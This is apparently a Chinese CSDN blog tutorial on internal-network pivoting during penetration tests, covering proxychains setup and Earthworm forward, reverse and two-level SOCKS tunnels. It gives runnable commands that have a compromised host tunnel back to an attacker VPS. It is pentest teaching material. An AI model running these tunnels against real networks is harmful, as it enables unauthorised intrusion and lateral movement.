内网代理以及Earthworm使用

本文详细介绍了内网渗透中使用的代理技术,包括web服务扫描、代理隧道选择(如HTTP和SOCKS),以及在Windows和Linux环境下使用的proxychains和Earthworm工具,涵盖正向代理、反向代理以及二级代理的设置和实验步骤。
摘要由CSDN通过智能技术生成

内网代理介绍

内网代理介绍

内网资产扫描这种场景一般是进行内网渗透才需要的代理技术,如果你不打内网一般是不需要这种技术的,内网代理技术一般也是采用http或者socks代理

针对以上的情况我们需要如何对内网进行扫描呢?

1、直接使用web服务进行扫描(这种方式请看内网渗透)

2、做代理让web服务成为代理机器

针对于内网的机器要考虑是用代理隧道还是使用端口转发

在这种情况需要用什么工具走代理呢?

1、扫描工具

2、浏览器

3、burp

使用代理一般是用http代理或者socks代理代理后的

代理连接工具

windows工具

如果是windows是proxyifile工具

1、运行软件然后点进进行一步一步安装

2、安装完成运行软件

3、打开代理服务器配置,可以看到支持http和socks代理

4、该工具支持代理链,代理链可以支持多级代理

linux工具

linux工具下一般使用命令行工具proxychains

1、该工具在kali中自带我们看一下安装步骤

2、下载Proxychains源码,可以从GitHub上下载,https://github.com/rofl0r/proxychains-ng,我已经下载好了

3、解压文件然后进行安装

tar zxvf proxychains-ng-4.17.tar.gz
cd proxychains-ng-4.17
./configure
make
make install

4、安装完成之后,先将proxychains.conf文件复制到/usr/local/etc/

5、需要修改配置文件/usr/local/etc/proxychains.conf,将其中的代理服务器修改为你的代理服务器

6、修改完成之后,可以使用proxychains命令来使用代理服务器,示例

proxychains4 curl www.baidu.com

Earthworm使用

Earthworm简介

Earthworm简称EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透

该工具已经停止维护和下载:EarthWorm

该工具支持端口转发,正向代理,反向代理,多级代理等方式,可以打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制

接下来我们学习一下

下载地址;https://github.com/idlefire/ew

(一级代理)正向代理

正向意思就是攻击者可以访问目标的机器,也就意味着目标的机器在公网

正向连接就是黑客主动连接web服务器,在web开启监听

web服务器执行如下命令

ew_for_win -s ssocksd -l 1080

黑客的电脑使用froxyifile或者proxychains等工具进行连接

实验步骤

1、使用漏洞将web服务器控制下来然后上传ew工具执行开启监听

ew_for_win -s ssocksd -l 1080

2、使用proxyifile连接

3、配置代理规则

4、使用工具测试

5、测试linux

(一级代理)反向代理

反向连接适合于目标没有公网 IP 的情况,这时就需要一台公网 vps 了,这里就直接以内网地址作为演示了

VPS执行如下

ew -s rcsocks -l 1080 -e 4444

目标器执行如下

ew -s rssocks -d vps -e 4444

这条命令表示在本地开启 socks 5 服务,并反弹到 vps 的 4444 端口,如果代理建立成功,在 VPS 端就会看到 rssocks cmd_socket OK! 的提示

在黑客的机器上使用工具连接VPS的1080端口

实验步骤

1、先在VPS上开启监听

ew_for_win -s rcsocks -l 1080 -e 4444

2、然后再靶机上连接VPS

ew_for_win -s rssocks -d 192.168.1.9 -e 4444

3、在黑客电脑上使用工具连接

(二级代理)正向连接二级代理

二级代理发生在如下的情况

1、web服务器在公网黑客可以访问

2、B机器在内网黑客不能访问

3、web服务器只能访问B机器

4、B机器可以访问内网机器

这种昂情况使用二级正向代理

在B主机上执行

ew -s ssocksd -l 4444

在web服务器上执行

ew -s lcx_tran -l 1080 -f B -g 4444

黑客使用工具连接web服务器的1080端口从而实现访问内网机器

实验步骤

1、在内网的机器B上执行命令

ew_for_win -s ssocksd -l 4444

2、在web机器上执行如下命令

ew_for_win -s lcx_tran -l 1080 -f 192.168.1.8 -g 4444

3、测试代理

(二级代理)反向连接

1、web服务器在内网可以访问VPS

2、内网机器B在内网不能访问VPS可以访问web服务

vps

ew_for_win -s lcx_listen -l 1080 -e 4444

主机B

ew_for_win -s ssocksd -l 5555

主机A

ew_for_win -s lcx_slave -d 192.168.1.8 -e 4444 -f 192.168.36.130 -g 5555
  • 22
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值